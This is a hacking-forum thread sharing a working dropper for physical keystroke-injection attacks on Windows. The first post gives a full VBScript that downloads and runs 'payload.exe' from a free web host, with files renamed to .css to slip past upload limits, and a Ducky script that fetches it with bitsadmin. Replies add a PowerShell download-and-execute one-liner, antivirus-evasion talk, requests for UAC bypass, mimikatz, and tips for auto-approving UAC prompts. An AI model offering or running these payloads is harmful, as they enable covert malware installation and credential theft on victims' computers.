Jump to content

Fast payload download and install script


Recommended Posts

So, this script downloads VB script via cmd and witch downloads payload.exe.

To use this script you'll need some prep to do. First, sign up for a free website hosting (like eu.pn). You don't need to create any website, just to use that host for easy payload downloads. Rename VB script from .vbs to .css, also do the same for the payload from .exe to .css. WHY? Because you can't upload other file formats but html, css, js, and image formats and you need a full path link for this to work! And NO, you don't have to have admin rights for this to work!

VB script:

SaveWebBinary "http://yourfreesubdomain.eu.pn/payload.css", "C:\Users\Public\payload.exe"
Function SaveWebBinary(strUrl, strFile) 'As Boolean
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Const ForWriting = 2
Dim web, varByteArray, strData, strBuffer, lngCounter, ado
    On Error Resume Next
    'Download the file with any available object
    Err.Clear
    Set web = Nothing
    Set web = CreateObject("WinHttp.WinHttpRequest.5.1")
    If web Is Nothing Then Set web = CreateObject("WinHttp.WinHttpRequest")
    If web Is Nothing Then Set web = CreateObject("MSXML2.ServerXMLHTTP")
    If web Is Nothing Then Set web = CreateObject("Microsoft.XMLHTTP")
    web.Open "GET", strURL, False
    web.Send
    If Err.Number <> 0 Then
        SaveWebBinary = False
        Set web = Nothing
        Exit Function
    End If
    If web.Status <> "200" Then
        SaveWebBinary = False
        Set web = Nothing
        Exit Function
    End If
    varByteArray = web.ResponseBody
    Set web = Nothing
    'Now save the file with any available method
    On Error Resume Next
    Set ado = Nothing
    Set ado = CreateObject("ADODB.Stream")
    If ado Is Nothing Then
        Set fs = CreateObject("Scripting.FileSystemObject")
        Set ts = fs.OpenTextFile(strFile, ForWriting, True)
        strData = ""
        strBuffer = ""
        For lngCounter = 0 to UBound(varByteArray)
            ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
        Next
        ts.Close
    Else
        ado.Type = adTypeBinary
        ado.Open
        ado.Write varByteArray
        ado.SaveToFile strFile, adSaveCreateOverWrite
        ado.Close
    End If
    SaveWebBinary = True
End Function
wscript.sleep 5000
CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe"

Ducky script:

GUI r
DELAY 200
STRING cmd /C bitsadmin /transfer /download /priority foreground http://yourfreesubdomain.eu.pn/vb_script.css C:\Users\Public\dl.vbs && start C:\Users\Public\dl.vbs
ENTER

Happy hacking!

Link to post
Share on other sites
  • 2 months later...

Why download and use the VB script to download the end file when you can just download and execute the file directly?

Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.

Link to post
Share on other sites

Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.

You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.

(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'
Link to post
Share on other sites

You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.

(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'

I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.

Link to post
Share on other sites

i use panda free antivirus is there any other vb script whice do the same but dont get detected?

it also usefull because you can change the download file on your webspace and you dont need to change the rubby usb inject.bin :D

I scanned vb script on virus total, and didn't get any detections.

Link to post
Share on other sites

https://www.virustotal.com/de/file/93f47a42353bbf6a88332c0a18b721254e991a0476a6d155fbac60a80fe85bc2/analysis/1455991661/

lol my av detects it panda :)

i thought its a bad av scanner

but on most av its clean so its useabel xD

Damn, AVs are updated too fast. LoL Anyway, simple google search will get you a lot of vb scripts for downloading a file.

Link to post
Share on other sites

I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.

I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions.

Link to post
Share on other sites

I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versAre you

Are you sure? Because bitsadmin is on win10. Anyway does anyone knows any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful.

Link to post
Share on other sites

Are you sure? Because bitsadmin is on win10. Anyway does anyone knows any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful.

I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt.

That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.

Link to post
Share on other sites

I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt.

That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.

I tried simulating keystrokes and i didn't work. But the mimikatz is still working, i'm trying to implement it somehow.

Link to post
Share on other sites

I tried simulating keystrokes and i didn't work. But the mimikatz is still working, i'm trying to implement it somehow.

The point I was trying to make at the end there is that you should get admin immediately, then you can maintain it easily. Having physical access means that all security measures are basically pointless, all that matters is automating it. In this case, using the ducky to send ALT y while at a UAC prompt will accept it and continue.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...